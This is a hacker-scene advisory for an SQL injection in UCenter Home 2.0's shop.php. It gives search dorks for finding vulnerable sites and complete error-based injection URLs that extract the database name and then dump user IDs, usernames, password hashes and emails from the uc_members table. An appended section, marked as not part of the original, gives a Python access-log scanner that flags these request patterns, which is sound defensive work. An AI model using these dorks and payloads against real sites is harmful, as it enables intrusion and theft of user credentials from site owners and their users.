__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
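
A log check for the request pattern above, added here as an example and not part of the original advisory: it flags `shop.php?ac=view` requests whose `shopid` is not a plain integer and reports which of the advisory's error-based markers appear in it. The Apache combined log format, the sample lines and all function and marker names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers taken from the requests shown in the advisory (MySQL error-based injection).
MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "uc_members": re.compile(r"uc_members", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHOPID_RE = re.compile(r"[0-9]{1,10}")  # assumed shape of a legitimate shop id

SAMPLE_LOG = [  # constructed lines, Apache combined format, documentation IPs
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def inspect_request(target):
    """Return (suspicious, reasons) for one request target (path plus query)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shop.php"):
        return False, []
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    if "view" not in params.get("ac", []):
        return False, []
    reasons = []
    for value in params.get("shopid", []):
        if not SHOPID_RE.fullmatch(value):  # anything but digits is out of contract
            reasons.append("non_numeric_shopid")
        reasons += [name for name, rx in MARKERS.items() if rx.search(value)]
    return bool(reasons), sorted(set(reasons))

def scan(log_lines):
    """Yield (line_number, reasons) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hit, reasons = inspect_request(match.group(1))
            if hit:
                yield number, reasons

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The same integer-only rule for `shopid`, enforced in the application before the value reaches a query, is the input check that closes this class of request.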